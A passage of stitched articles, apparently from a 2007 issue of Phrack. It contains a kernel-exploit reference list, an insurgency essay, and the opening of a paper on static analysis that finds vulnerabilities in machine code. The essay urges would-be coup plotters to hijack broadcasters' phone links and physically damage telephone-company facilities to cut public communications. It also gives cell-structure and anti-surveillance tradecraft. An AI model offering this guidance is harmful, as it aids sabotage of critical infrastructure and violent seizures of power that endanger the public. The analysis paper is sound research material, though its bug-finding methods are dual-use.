[8] - Jeff Bonwick, "The Slab Allocator: An Object-Caching Kernel
      Memory Allocator"

[9] - Daniel P. Bovet & Marco Cesati
      "Understanding the Linux Kernel", 3rd Edition [ISBN 0-596-00565-2]

[10] - Richard McDougall and Jim Mauro
       "Solaris Internals" , 2nd Edition [ISBN 0-13-148209-2]

[11] - Mel Gorman, "Linux VM Documentation"

[12] - sd, krad exploit for sys_epoll vulnerability

[13] - noir, "Smashing The Kernel Stack For Fun And Profit"

[14] - UltraSPARC User's Manuals

[15] - pr1, "Exploiting SPARC Buffer Overflow vulnerabilities"

[16] - horizon, Defeating Solaris/SPARC Non-Executable Stack Protection

[17] - Gavin Maltby's Sun Weblog, "SPARC System Calls"

[18] - PaX project 	    

[19] - Solar Designer, "Getting around non-executable stack (and fix)"

[20] - Sebastian Krahmer, "x86-64 buffer overflow exploits and the
       borrowed code chunks exploitation technique" 

[21] - Laurent BUTTI, Jerome RAZNIEWSKI & Julien TINNES
       "Madwifi SIOCGIWSCAN buffer overflow"

[22] - sgrakkyu, "madwifi linux remote kernel exploit"

[23] - sd & devik, "Linux on-the-fly kernel patching without LKM"

[24] - Joel Eriksson, Karl Janmar & Christer Oberg, "Kernel Wars"

------[ 6 - Sources - drivers and exploits [stuff.tgz]

begin 644 stuff.tgz


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 7              (* *)
            | - |                                            | - |
            |   |     The Revolution will be on YouTube      |   |
            |   |                                            |   |
            |   |                 By Gladio                  |   |
            |   |                                            |   |
            |   |                                            |   |

Forget everything you know about revolutions. It's all wrong.

Fighting a conventional war in an industrialized nation is suicide. Even
if you could field a military force capable of defeating the government
forces, the wreckage wouldn't be worth having. Think about mortar shells
landing in chemical plants. Massive toxic waste spills. Poisonous clouds
drifting with the winds. Fighting a war in your own backyard is just
plain stupid. Notice how the super-powers fight each other with proxy
wars in other countries.

Sure it might be fun to form a militia and go play army with your friends
in Idaho. Got some full-auto assault rifles?  Maybe even mortars, heavy
machine guns and some anti-aircraft guns?

Think they can take out an AC-130 lobbing artillery shells from 12 miles
away? A flight of A-10s spitting depleted uranium shells the size of your
fist at a rate that makes the cannon sound like a redlined dirt bike? A
shooting war with a modern government is a shortcut to obliteration.

Most coups are accomplished (or thwarted) by skillful manipulation of
information. There have been a number of countries where tyrants (and
legitimate leaders) have been overthrown by very small groups using mass
communications effectively.

The typical method involves blocking all (or most) information sources
controlled by the government, and supplying an alternative that delivers
your message. Usually, you just announce the change in government, tell
everyone they are safe and impose a curfew for a short time to consolidate
your control. Announce that the country, the police and the military are
under your control, and keep repeating it. Saturate the airwaves with your
message, while preventing any contradictory messages from propagating.

Virtually all broadcast media use the telephone network to deliver content
from their studios to their transmitters.  Networks use satellites and
pstn to distribute content to local stations, which then use pstn to
deliver it to the transmitter site.

Hijacking these phone connections accomplishes both goals, of denying the
'official' media access, and putting your own message out.

In cases where you can't hijack the transmitters, dropping the pstn
will be effective. Police and military also use pstn to connect dispatch
centers with transmitter towers. Recently, many have installed wireless
(microwave) fallback systems.

Physically shutting down the pstn just prior to your broadcasts may be
very effective. This is most easily accomplished by physical damage to
the telco facilities, but there are also non-physical technical means to
do this on a broad scale.  Spelling them out here would only result in the
holes being closed, but if you have people with the skill set to do this,
it is preferable to physical means because you will have the advantage
of utilizing these communications resources as your plan progresses.

Leveraging the Internet

Most of the FUD produced about insurgency and the internet is focused on
"taking down" the internet. That's probably not the most effective use
of technical assets. An insurgency would benefit more from utilizing the
net. One use is mass communications. Get your message out to the masses
and recruit new members.

Another use is for communications within your group. This is where things
get sticky. Most governments have the ability to monitor and intercept
their citizens' internet traffic. The governments most deserving of
being overthrown are probably also the most effective at electronic
surveillance.

The gov will also infiltrate your group, so forums aren't going to
be the best means of communicating strategies and tactics. Forums can
be useful for broad discussions, such as mission statements, goals and
recruiting. Be wary of traffic analysis and sniffing. TOR can be useful,
particularly if your server is accessible only on the TOR network.

Encryption is your best friend, but can also be your worst enemy. Keep
in mind that encryption only buys you time. A good, solid cipher will
not likely be read in real time by your opponent, but will eventually
be cracked. The important factor here is that it not be cracked until
it's too late to be useful.

A one time pad (OTP) is the best way to go. Generate random data and
write it to 2, and only 2, DVDs. Physically transport the DVDs to each
communications endpoint. Never let them out of your direct control. Do
not mail them. Do not send keys over ssh or ssl. Physically hand the DVD
to your counterpart on the other end. Never re-use a portion of the key.

Below is a good way to utilize your OTP:

Generate a good OTP (K), come up with a suspicious alternate message
(M), and knowing your secret text (P), you calculate (where "+" = mod
26 addition):

K' = M + K 
K'' = P + K 
C = K' + P

Lock up K'' in a safety deposit box, and hide K' in some other off-site,
secure location. Keep C around with big "beware of Crypto systems"
signs. When the rubber hose is broken out, take at least 2 good lickings,
and then give up the key to the safety deposit box. They get K'',
and calculate (where "-" = mod 26 subtraction)

C - K'' = M

thus giving them the bogus message, and protecting your real text
(which you recover yourself as C - K' = P).
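A minimal sketch of the scheme, over the letters A-Z only (the helper
names are ours, purely illustrative). Note that since "+" is mod-26
addition, recovery here is done with mod-26 subtraction, its inverse:

```python
# Sketch of the duress-key OTP scheme above, over A-Z with mod-26
# arithmetic (helper names are ours, purely illustrative).
import random

A = ord('A')

def add(x, y):
    """Letter-wise mod-26 addition (the "+" of the scheme)."""
    return ''.join(chr((ord(a) + ord(b) - 2 * A) % 26 + A) for a, b in zip(x, y))

def sub(x, y):
    """Letter-wise mod-26 subtraction (used for recovery)."""
    return ''.join(chr((ord(a) - ord(b)) % 26 + A) for a, b in zip(x, y))

P = "ATTACKATDAWN"                                   # real message
M = "MEETMEATNOON"                                   # bogus duress message
K = ''.join(random.choice("ABCDEFGHIJKLMNOPQRSTUVWXYZ") for _ in P)  # pad

K1 = add(M, K)     # K'  = M + K   (hidden off-site)
K2 = add(P, K)     # K'' = P + K   (safety deposit box)
C  = add(K1, P)    # C   = K' + P  (kept at hand)

assert sub(C, K2) == M     # the duress key yields the bogus message
assert sub(C, K1) == P     # the real holder recovers the secret text
```

Under duress you surrender K'', and C - K'' decrypts to the plausible
decoy M; only C - K' recovers the real text P.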

Operational Security

The classic "cellular" configuration is the most secure against
infiltration and compromise. A typical cell should have no more than 5-10
members. One leader, 2 members who each know how to contact one member
of an 'upstream' cell, and 2 members who each know how to contact one
member of a downstream cell. Nobody, including the leader, should know
how to contact more than one person outside of their own cell.

Never use your real name, and never use your organizational alias in
any other context.

Electronic communications between members should be kept to a
minimum. When it is necessary, it should only be conducted via the OTP
cipher. Preferably, these communications should consist of not much more
than arranging a physical meeting.  Meet at a pre-arranged place, and
then go to another, un-announced place where surveillance is difficult,
to discuss operational matters.

Do not carry a phone. Even a phone which is switched off can be
tracked, and most can be used to eavesdrop on discussions even when
powered down. Removing the battery is only marginally safer, because
tracking/listening gear can be built into the battery pack. If you find
yourself stuck with a phone during a meeting, remove the battery and
place both the phone and battery in a metal box and remove it from the
immediate area of conversation.

It never hurts to generate some bogus traffic. Gibberish, random data,
innocuous stories etc., all serve to generate noise in which to better
hide your real communications.

Steganography can be useful when combined with solid crypto. Encrypt and
stego small messages into something like a full length movie avi, and
distribute it to many people via a torrent. Only your intended recipient
will have the key to decrypt the stegged message. Be sure to stego some
purely random noise into other movies, and torrent them as well.

Hopefully you'll find this document useful as a starting point for
further discussion and refinement. It's not meant to be definitive, and
is surely not comprehensive. Feel free to copy, add, edit or change as
you see fit. Please do add more relevant to your area(s) of expertise.


		  Automated vulnerability auditing in machine code

             		Tyler Durden <> 

		              Phrack Magazine #64
		             Version of May 22 2007


I. Introduction
   a/ On the need of auditing automatically
   b/ What are exploitation frameworks
   c/ Why this is not an exploitation framework
   d/ Why this is not fuzzing
   e/ Machine code auditing : really harder than sources ? 

II. Preparation
   a/ A first intuition 
   b/ Static analysis vs dynamic analysis
   c/ Dependences & predicates
       - Controlflow analysis
       - Dataflow analysis
   d/ Translation to intermediate forms
   e/ Induction variables (variables in loops)     

III. Analysis
   a/ What is a vulnerability ?
   b/ Buffer overflows and numerical intervals
	- Flow-insensitive
	- Flow-sensitive
	- Accelerating the analysis by widening
   c/ Type-state checking
	- Memory leaks
	- Heap corruptions	
   d/ More problems
	- Predicate analysis
	- Alias analysis and naive solutions
	- Hints on detecting race conditions

IV. Chevarista: an analyzer of binary programs
   a/ Project modelization
   b/ Program transformation
   c/ Vulnerability checking
   d/ Vulnerable paths extraction
   e/ Future work : Refinement

V. Related Work
   a/ Model Checking
   b/ Abstract Interpretation

VI. Conclusion
VII. Greetings
VIII. References
IX. The code


Software has bugs. That is quite a well-known fact.

----------------------[ I. Introduction

In this article, we will discuss the design of an engine for automated 
vulnerability analysis of binary programs. The source code of the 
Chevarista static analyzer is given at the end of this document.

The purpose of this paper is not to disclose 0day vulnerabilities, but
to understand how it is possible to find them without (or with
restricted) human intervention. However, we will not kindly provide
the results of our automated auditing on predefined binaries : instead
we will always take generic examples of the most common difficulties 
encountered when auditing such programs. Our goal is to enlighten the 
underground community about writing your own static analyzer, not
to be profitable for security companies or any profit-oriented organization.

Instead of going straight to the results of the proposed implementation, 
we will first introduce the domain of program analysis, without going deeply
into the theory (which can get very formal), but taking the perspective
of a hacker who is tired of focusing on a specific exploit problem
and wants to investigate to what automatic extent it is possible
to find vulnerabilities and generate an exploit code for them without
human intervention.

Chevarista hasn't reached its goal of being this completely automated
tool; however, it shows the path to implementing such a tool incrementally,
with a genericity that makes it capable of finding any definable kind 
of vulnerability.

Detecting all the vulnerabilities of a given program can be
intractable, and this for many reasons. The first reason is that
we cannot predict whether a program running forever will ever have
a bug or not. The second reason is that if this program ever stops,
the number of states (as in "memory contexts") it reached and passed
through before stopping is very big, and testing all possible
concrete program paths would either take your whole life, or a dedicated 
big cluster of machines working on this for you for ages.

As we need more automated systems to find bugs for us, and we do not
have such computational power, we need to be clever about what has to be 
analyzed and how generically we can reason about programs, so that a single 
small analyzer can reason about a lot of different kinds of bugs. After all, 
if the effort is not worth the genericity, it is probably better to audit 
code manually, which would be more productive. However, automated systems
are not limited to vulnerability finding: because of their tight 
relation with the analyzed program, they can find the exact conditions 
in which a bug happens, and what context must be reached to trigger it.

But someone could interject : "Is not Fuzzing supposed to do
that already ?". My answer would be : Yes. But static analysis is
the intelligence inside Fuzzing. Fuzz testing programs gives very
good results, but any good fuzzer needs to be designed with major static
analysis orientations. This article also applies somewhat to fuzzing,
but the proposed implementation of the Chevarista analyzer is not 
a fuzzer. The first reason is that Chevarista does not execute the
program to analyze it. Instead, it acts like a (de)compiler but 
performs analysis instead of translating (back) to assembly (or source) code.
It is thus much more performant than fuzzing, but requires a lot of
development and literature review to end up with the complete
automatic tool that every hacker dreams of maintaining.

Another lost guy will claim : "Your stuff looks more or less like an
exploitation framework, it's not so new". Exploitation frameworks
are indeed not very new stuff. None of them analyzes for vulnerabilities,
and they actually only work if the builtin exploits are good enough. When
the framework aims at letting you trigger exploits manually, then it
is not an automated framework anymore. This is why Chevarista is not
CORE-Impact or Metasploit : it is an analyzer that finds bugs in programs
and tells you where they are.

One more fat guy at the end of the room will be threatening: "It is simply
not possible to find vulnerabilities in code without the source .." and
then a lot of people will stand up and declare this a prophecy, 
because it is already sufficiently hard to do on source code anyway.
I would simply temper this judgement with several remarks: for some
people, assembly code -is- source code, thus having the assembly is
like having the source, minus a certain amount of information. It
is this amount of lost information that we need to recover when writing
a decompiler.

First, we do not have the names of variables, but naming variables in a
different way does not affect the result of a vulnerability analysis. Second,
we do not have the types, but data types in compiled C programs do not really
enforce properties about the variables' values (because of C casts or a
compiler lacking strong type checking). The only real information that is
enforced is the variable size in memory, which is recoverable from an
assembly program most of the time. This is not as true for C++ programs (or
other programs written in higher-level object-oriented or functional
languages), but in this article we will mostly focus on compiled C programs.

A widely spread opinion about program analysis is that it is harder to 
achieve on a low-level (imperative) language than on a high-level 
(imperative) language. This is both true and false, and we need to bring 
more precision to this statement. Specifically, we want to compare the
analysis of C code and the analysis of assembly code:

| Available information   |      C code         |    Assembly code    |
|-------------------------|---------------------|---------------------|
| Original variable names |    Yes (explicit)   |         No          |
| Original type names     |    Yes (explicit)   |         No          |
| Control sequentiality   |    Yes (explicit)   |    Yes (explicit)   |
| Structured control      |    Yes (explicit)   |    Yes (recoverable)|
| Data dependencies       |    Yes (implicit)   |    Yes (implicit)   |
| Data types              |    Yes (explicit)   |    Yes (recoverable)|
| Register transfers      |    No               |    Yes (explicit)   |
| Selected instructions   |    No               |    Yes (explicit)   |

Let's discuss those points in more detail:

 - Control sequentiality is obviously kept in the assembly, else
the processor would not know how to execute the binary program.
However, the binary program does not contain a clearly structured
tree of execution. Conditionals, and especially loops, do not appear
as such in the executable code. We need a preliminary analysis for
structuring the control flow graph. This has already been done on source
and binary code using different algorithms that we do not present
in this article.

- Data dependencies are not explicit even in the source program; however,
we can compute them precisely both in the source code and the binary code.
The dataflow analysis on the binary code is slightly different though,
because it covers every single load and store between registers and
the memory, not only the level of variables, as done in the source
program. Because of this, assembly programs contain more instructions
than source programs contain statements. This is an advantage and a
disadvantage at the same time. It is an advantage because we can track
the flow in a much more fine-grained fashion at the machine level, which
is necessary especially for all kinds of optimizations, 
or for machine-specific bugs that rely on a certain variable being either
in memory or in a register, etc. It is a disadvantage because we 
need more memory to analyze such bigger program listings.

- Data types are explicit in the source program. Types are probably the
hardest information to recover from binary code. 
However, this has been done already, and the approach we present in this
paper is definitely compatible with existing work on type-based
decompilation. Data types are much harder to recover when dealing with
real objects (like classes in compiled C++ programs). We will not deal
with the problem of recovering object classes in this article, as we 
focus on memory-related vulnerabilities.

- Register-level anomalies can happen [DLB], which can be useful for a 
hacker to determine how to create a context of registers or memory when 
writing exploits. Binary-level code analysis has the advantage that it 
provides a tighter approach to exploit generation on real-world existing 
binaries.

- Instruction-level information is interesting again to make sure we don't
miss bugs introduced by the compiler itself. It is academically very well
respected to code a certified compiler that proves the semantic equivalence
between source code and compiled code, but from the hacker point of view, it
does not mean so much. Concrete use in the wild means concrete code,
means assembly. Additionally, it is rarer, but irregularities have
already been witnessed in a processor's execution of specific
patterns of instructions, so an instruction-level analyzer can deal with
those, but a source-level analyzer cannot. A last reason I would mention
is that the source code of a project is very verbose. If a code analyzer
is embedded into some important device, either the source code of the
software inside the device will not be available, or the device will lack
the storage or communication bandwidth to keep an accessible copy of the
source code. Binary code analyzers do not have this dependency on source
code and can thus be used in a wider scope.

To sum up, there is a lot of information recovery work to do before
starting to perform the source-like level analysis. However, the only
information that is not available after recovery is not mandatory for
analyzing code : the names of types and variables do not affect the
execution of a program. We will abstract those away from our analysis
and use our own naming scheme, as presented in the next chapter of this
paper.
-------------[ II. Preparation

We have to go back to our first wishes and try to understand better what
vulnerabilities are, how we can detect them automatically, and whether we
are really capable of generating exploits from analyzing a program that we
do not even execute. The answer is yes and no, and we need to make 
things clear about this. The answer is yes, because if you know exactly
how to characterize a bug, and if this bug is detectable by some 
algorithm, then we can code a program that will reason only about
those known-in-advance vulnerability specificities and convert the 
raw assembly (or source) code into an intermediate form that will make
clear where the specificities happen, so that the "signature" of the
vulnerability can be found if it is present in the program. The answer
is no, because given an unknown vulnerability, we do not know in
advance the specificities that characterize its signature. It
means that we somewhat have to take an approximate signature and 
check the program, but the result might be an over-approximation (a
lot of false positives) or an under-approximation (finding nothing or
few, while vulnerabilities exist without being detected).

Fuzzing and black-box testing are dynamic analysis; the core of 
our analyzer is not, but it can find an interest in running the 
program for a different purpose than a fuzzer does. Fuzzers try their 
chance on randomly crafted inputs; they do not have an *inner*
knowledge of the program they analyze. This is a major issue because
a dynamic analyzer such as a fuzzer cannot optimize or refine
its inputs depending on events that are unobservable to it. A fuzzer
can as well be coupled with a tracer [AD] or a debugger, so that fuzzing 
is guided by the debugger's knowledge of internal memory states and 
variable values during the execution of the program.

Nevertheless, a real code analysis tool must be an integrated 
solution, to avoid losing even more performance by using an external 
debugger (like gdb, which is awfully slow when using ptrace). Our 
technique of analysis is capable of taking decisions depending on the 
internal states of a program even without executing it. However, our 
representation of a state is abstract : we do not compute the whole 
content of the real memory state at each step of execution, but consider
only the information meaningful to the behavior of the program, by
automatically letting the analyzer annotate the code with qualifiers such
as : "The next instruction will perform a memory allocation" or "Register
R or memory cell M will contain a pointer to a dynamically allocated
memory region". We will explain heap-related property checking in more
detail in the type-state analysis paragraph of Part III.

In this part of the paper, we will describe a family of intermediate forms
which bridge the gap between code analysis on structured code and code
analysis on unstructured (assembly) code. Conversion to those intermediate
forms can be done from binary code (like in an analyzing decompiler) or from
source code (like in an analyzing compiler). In this article, we will
transform binary code into a program written in an intermediate form, and then
perform all the analysis on this intermediate form. All the studied properties
will be related to dataflow analysis. No structured control flow is necessary
to perform those; a simple control flow graph (or even a list of basic blocks
with xrefs) can be the starting point of such analysis.

Let's be more concrete and illustrate how we can analyze the internal states
of a program without executing it. We start with a very basic piece of code:

Stub 1:
			 o			o  : internal state
 if (a)		        / \		
   b++;		->     o   o			/\ : control-flow splitting 
 else		        \ /			\/ : control-flow merging
   c--;	               	 o

In this simplistic example, we represent the program as a graph whose
nodes are states and edges are control flow dependencies. What is an internal
state ? If we want to use all the information of each line of code,	
we need to make it an object remembering which variables are used and modified 
(including the status flags of the processor). Each of those control states
performs certain operations before jumping to another part of the code
(represented by the internal states for the if() or else() code stubs). Once
the if/else code is finished, both paths merge into a unique state, which is
the state after having executed the conditional statement. Depending on how
abstract the analysis is, the internal program states will track more or less
of the requested information at each computation step. For example, one must
differentiate a control-flow analysis (like in the previous example) from a
dataflow analysis.

Imagine this piece of code:

Stub 2:

Code			Control-flow		  Data-flow with predicates

                                                       /    \  \
                                                      /      \  \
						     /  c     \  \
c = 21;			    o		            |   o    b o  \
b = a;			    |			    |  / \    /    \ 
a = 42;			    o			     \/   ------   /
if (b != c)		   / \		             /\  |b != c| /  
  a++;			  o   o  		    /  \  ------ /
else			   \ /                     /    \ /   \ /
  a--;                      o                     |    a o   a o
c += a;                     |                      \     |    /
-------                     o                       \    |   /
			                             \   |  /
						      \	 | / 
                                                       c o 	

In a dataflow graph, the nodes are the variables, and the arrows are the
dependencies between variables. The control-flow and data-flow graphs are
actually complementary pieces of information. One only cares about the
sequentiality in the graph; the other one cares about the dependencies
between the variables, without apparently enforcing any order of evaluation.
Adding predicates to a dataflow graph helps at determining which nodes are
involved in a condition and which instance of the successor data nodes (in
our case, variable a in the if() or the else()) should be considered for our
analysis.
As you can see, even a simple data-flow graph with only a few variables
starts to get messy already. To clarify the representation of the 
program we are working on, we need some kind of intermediate representation
that keeps the sequentiality of the control-flow graph, but also provides the
dependencies of the data-flow graph, so we can reason on both of them
using a single structure. We can use some kind of "program dependence graph"
that sums both up in a single graph. That is the graph we will consider
for the next examples of the article.
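To make the "program dependence graph" idea concrete, here is a minimal
sketch encoding Stub 2: each node carries its control-flow successors plus
the variables it defines and uses, so control and data dependencies live in
one structure. The node type and helper names are ours, purely illustrative,
and not taken from the Chevarista code:

```python
# Minimal program dependence graph for Stub 2 (illustrative only).

class Node:
    def __init__(self, name, defines=None, uses=()):
        self.name = name          # source-level statement, for display
        self.defines = defines    # variable written here, if any
        self.uses = tuple(uses)   # variables read here
        self.succ = []            # control-flow successors

# Stub 2: c = 21; b = a; a = 42; if (b != c) a++; else a--; c += a;
n1 = Node("c = 21",  defines="c")
n2 = Node("b = a",   defines="b", uses=["a"])
n3 = Node("a = 42",  defines="a")
p  = Node("b != c",  uses=["b", "c"])            # predicate node
n4 = Node("a++",     defines="a", uses=["a"])
n5 = Node("a--",     defines="a", uses=["a"])
n6 = Node("c += a",  defines="c", uses=["c", "a"])

for src, dst in [(n1,n2),(n2,n3),(n3,p),(p,n4),(p,n5),(n4,n6),(n5,n6)]:
    src.succ.append(dst)

def data_deps(entry):
    """DFS over the CFG carrying reaching definitions: emits one
    def -> use edge per dependence (fine for this acyclic stub)."""
    deps = set()
    def walk(node, defs):
        for v in node.uses:
            if v in defs:                        # else: program input (a)
                deps.add((defs[v].name, node.name))
        if node.defines:
            defs = dict(defs, **{node.defines: node})
        for s in node.succ:
            walk(s, defs)
    walk(entry, {})
    return sorted(deps)

for d, u in data_deps(n1):
    print("%-8s -> %s" % (d, u))
```

Note how the predicate node depends on the definitions of b and c, and how
c += a picks up both the a++ and the a-- instance of a, exactly as in the
hand-drawn graph above.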

Some intermediate forms introduce special nodes in the data-flow graph, and
give well-recognizable types to those nodes. This is the case of the Phi()
and Sigma() nodes in the Static Single Assignment [SSA] and Static Single 
Information [SSI] intermediate forms, and that indeed facilitates reasoning
on the data-flow graph. Additionally, decomposing a single variable into
multiple "single assignments" (and multiple single uses too, in the SSI form),
that is, naming each apparition of a given variable uniquely, helps
disambiguate which instance of the variable we are talking about at a given
point of the program:

Stub 2 in SSA form	Stub 2 in SSI form	Data-flow graph in SSI form
------------------	------------------	--------------------------

c1 = 21;		c1 = 21;			              o a1
b1 = a1;		b1 = a1;			             / \
if (b1 != c1)		(a3, a4) = Sigma(a2);  (a3, a4) = Sigma(a2) o   o b1
  a2 = a1 + 1;		if (b1 != c1)                              /|
else			  a3 = a2 + 1;                            / |
                                                                 /  | 
                                                                /   |    
                                                               /    |    o c1
  a3 = a1 - 1;		else                                   |    |    |
a4 = Phi(a2, a3)	  a4 = a2 - 1;                      a3 o    o a4 |
c2 = c1 + a4;		a5 = Phi(a3, a4);                       \   |    |
			c2 = c1 + a5;                            \  |    |
----------------        -------------------                       \ |    |
                                                                   \|    |
                                                  a5 = Phi(a3, a4)  o    |
                                                                     \  /
                                                                      o c2

Note that we have not put the predicates (condition tests) in that graph. In
practice, it is more convenient to have additional links in the graph for 
predicates (they ease the testing of the predicate when walking the graph),
but we have removed them here just to clarify what SSA/SSI is about.
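The renaming itself can be sketched in a few lines. Below is a toy SSA
construction for Stub 2: statements are (dest, [sources]) pairs, each arm of
the conditional is renamed from the same environment, and one Phi() is
emitted per variable whose versions diverged at the merge point. The
representation and numbering are ours (and differ slightly from the figure):

```python
# Toy SSA renaming of Stub 2 (our own scheme, illustrative only).
from collections import defaultdict

counter = defaultdict(int)

def fresh(v):
    """Return the next unique version of variable v (a -> a1, a2, ...)."""
    counter[v] += 1
    return "%s%d" % (v, counter[v])

def rename(block, env):
    """Rename one straight-line block; each source maps to its current
    version, each destination gets a fresh one."""
    out, env = [], dict(env)
    for dest, srcs in block:
        srcs = [env[s] for s in srcs]
        env[dest] = fresh(dest)
        out.append((env[dest], srcs))
    return out, env

env = {"a": fresh("a")}                     # incoming value of a is a1

# c = 21; b = a; a = 42;
pre, env = rename([("c", []), ("b", ["a"]), ("a", [])], env)
# if (b != c) a++; else a--;   (each arm renamed from the same env)
then_, env_t = rename([("a", ["a"])], env)
else_, env_f = rename([("a", ["a"])], env)
# merge point: one Phi per variable whose versions diverged
phis, env_m = [], dict(env)
for v in env:
    if env_t[v] != env_f[v]:
        env_m[v] = fresh(v)
        phis.append((env_m[v], ["Phi", env_t[v], env_f[v]]))
# c += a;
post, env_m = rename([("c", ["c", "a"])], env_m)

for stmt in pre + then_ + else_ + phis + post:
    print(stmt)
```

Only a gets a Phi() here, since b and c reach the merge with a single
version each.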

Those "symbolic-choice functions" Phi() and Sigma() might sound a little bit
abstract. Indeed, they don't change the meaning of a program, but they capture
the information that a given data node has multiple successors (Sigma) or
ancestors (Phi). The curious reader is invited to look at the references for
more details about how to perform the intermediate translation. We will here 
focus on the use of such a representation, especially when analyzing code 
with loops, like this one:

		Stub 3 C code		Stub 3 in Labelled SSI form        
		-------------           ---------------------------       

		int a = 42;	        int a1 = 42;
		int i = 0;              int i1 = 0;

					P1 = [i1 < a1]
                        		(<i4:Loop>, <i9:End>) = Sigma(P1,i2);
					(<a4:Loop>, <a9:End>) = Sigma(P1,a2);
		while (i < a)           
		{                 =>    Loop:
                       			 a3 = Phi(<BLoop:a1>, <BEnd:a5>);
					 i3 = Phi(<BLoop:i1>, <BEnd:i5>);
  		  a--;                   a5 = a4 - 1;
  		  i++;                   i5 = i4 + 1;
					 P2 = [i5 < a5]
					 (<a4:Loop>, <a9:End>) = Sigma(P2,a6);
		        		 (<i4:Loop>, <i9:End>) = Sigma(P2,i6);
                        		 a8 = Phi(<BLoop:a1>, <Bend:a5>);
                        		 i8 = Phi(<BLoop:i1>, <Bend:i5>);
		a += i;                  a10 = a9 + i9;
		-----------             ---------------------------------

By synthesizing this form a bit more (grouping the variables
under a unique Phi() or Sigma() at merge or split points of the control
flow graph), we obtain a smaller but identical program. This time,
the Sigma and Phi functions do not take a single variable list as parameter,
but a vector of lists (one list per variable):

		Stub 3 in Factored & Labelled SSI form        

		int a1 = 42;
		int i1 = 0;

		P1 = [i1 < a1]

		(<i4:Loop>, <i9:End>)            (i2)
		(		    ) = Sigma(P1,(  ));
		(<a4:Loop>, <a9:End>)            (a2)

		(a3)      (<BLoop:a1>, <BEnd:a5>)
		(  ) = Phi(                     );
		(i3)      (<BLoop:i1>, <BEnd:i5>)

		a5 = a4 - 1;
		i5 = i4 + 1;

		P2 = [i5 < a5]

		(<a4:Loop>, <a9:End>)             (a6)
		(                   ) = Sigma(P2, (  ));
		(<i4:Loop>, <i9:End>)             (i6)


		(a8)      (<BLoop:a1>, <Bend:a5>)
		(  ) = Phi(                     );
		(i8)      (<BLoop:i1>, <Bend:i5>)

		a10 = a9 + i9;

How can we add information to this intermediate form ? The Phi()
and Sigma() functions now allow us to reason about forward dataflow
(in the normal execution order, using Sigma) and backward dataflow 
analysis (in the reverse order, using Phi). We can easily find the
inductive variables (variables that depend on themselves, like the
index or incrementing pointers in a loop), using a simple analysis:

Let's consider the Sigma() before each Label, and try to iterate its
application:

		(<a4:Loop>, <a9:End>)             (a6)
		(                   ) = Sigma(P2, (  ));
		(<i4:Loop>, <i9:End>)             (i6)

	->	(<a5:Loop>,<a10:End>)
		(                   )
		(<i5:Loop>,   _|_   )

	->      (<a6:Loop>,   _|_   )
		(                   )
		(<i6:Loop>,   _|_   )

We take _|_ ("bottom") as a notation meaning that a variable
has no more successors after a certain iteration
of the Sigma() function.

After some iterations (in this example, 2), we notice that
the left-hand side and the right-hand side are identical
for variables a and i. Indeed, both sides are expressed in
terms of a6 and i6. In mathematical jargon, this is what is
called a fixpoint (of a function F) :

	F(X) = X

or in this precise example:

	a6 = Sigma(a6)

By doing this simple iteration-based analysis over our
symbolic functions, we are able to deduce in an automated
way which variables are inductive in loops. In our example,
both a and i are inductive. This is very useful as you can imagine,
since those variables become of special interest for us, especially
when looking for buffer overflows that might happen on buffers in
looping code.
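
As a toy illustration of this fixpoint iteration, here is a minimal
sketch (the encoding is hypothetical, not chevarista's actual data
structures): the "defined in terms of" relation between the loop
variables is stored in a small boolean matrix, iterated until nothing
changes, and a variable is then inductive when it depends on itself:

```c
#include <assert.h>
#include <string.h>

/* Sketch only: dep[x][y] means "x is defined from y".  We iterate
 * the relation until a fixpoint is reached (F(X) = X), i.e. until
 * no new dependency appears.  A variable is inductive when it then
 * transitively depends on itself. */
#define NVARS 3
enum { VAR_A, VAR_I, VAR_TMP };     /* a, i and a helper variable */

static int dep[NVARS][NVARS];

static void close_deps(void)        /* naive transitive closure */
{
    int changed = 1;
    while (changed) {               /* stop at the fixpoint */
        changed = 0;
        for (int x = 0; x < NVARS; x++)
            for (int y = 0; y < NVARS; y++)
                if (dep[x][y])
                    for (int z = 0; z < NVARS; z++)
                        if (dep[y][z] && !dep[x][z])
                            dep[x][z] = changed = 1;
    }
}

static int is_inductive(int v)
{
    return dep[v][v];
}
```

For Stub 3, a5 is defined from a4 (a Sigma/Phi copy of a) and i5 from
i4, so both a and i end up depending on themselves, while a variable
computed once from them (like a10) does not.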

We will now specialize this analysis somewhat in the following
part of this article, by showing how this representation can
apply to finding vulnerabilities.

-------------------[ III. Analysis

	The previous part of the article introduced various notions
of program analysis. We will not use all of this formalism in the rest
of the article, and will focus on concrete examples. However, keep in
mind that from now on we reason about the intermediate form of the
analyzed programs. This intermediate form is suitable for both source
code and binary code, but we will keep staying at the binary level for
our examples, proposing the translation to C only for understanding
purposes. Until now, we have shown how to perform data-flow analysis
and find inductive variables from the (source or binary) code of
the program.

So what are the steps to find vulnerabilities now ?

A first intuition is that there is no generic definition of a
vulnerability. But if we can describe vulnerabilities as behaviors
that violate a certain precise property, we are able to state whether
a program has a vulnerability or not. Generally, the property depends
on the class of bugs you want to analyse. For instance, properties
that express buffer overflow safety and properties that express a heap
corruption (say, a double free) are different ones. In the first case,
we talk about the indexation of a certain memory zone which must never
go beyond the limit of the allocated memory. Additionally, for
having an overflow, this must be a write access. In case we have a
read access, we could refer to this as an info-leak bug, which
may be used blindly or unblindly by an attacker, depending on whether
the result of the memory read can be inspected from outside the process
or not. Sometimes a read-only out-of-bound access can also be used
to reach a part of the code that is not supposed to be executed
in such a context (if the out-of-bound access is used in a predicate).
In all cases, it is interesting to have our analyzer report this
unintended behavior, because it might lead to a wrong behavior, and
thus a bug.

In this part of the article, we will look at different classes of
bugs, and understand how we can characterize them, by running very
simple, repetitive, easy-to-implement algorithms. These algorithms
are simple only because we act on an intermediate form that already
indicates the meaningful dataflow and controlflow facts of the
program. Additionally, we will reason either forward or backward,
depending on which is best adapted to the vulnerability.

We will start with an example of numerical interval analysis and show
how it can be useful to detect buffer overflows. We will then show
how the dataflow graph, without any value information, can be useful
for finding problems happening on the heap. We will enrich our
presentation by describing a very classic problem in program analysis,
which is the discovery of equivalence between pointers (do they always
point to the same variable ? sometimes only ? never ?), also known as
alias analysis. We will explain why this analysis is mandatory for any
serious analyzer that acts on real-world programs. Finally, we will
give some more hints about analyzing concurrency properties inside
multithreaded code, trying to characterize what a race condition is.

------------[ A. Numerical intervals

	When looking for buffer overflows or integer overflows, the
relevant information is the set of values that can be taken by
memory indexes or integer variables, which is numerical information.

Obviously, it would not be serious to compute every single possible
value for all variables of the program, on each program path : this
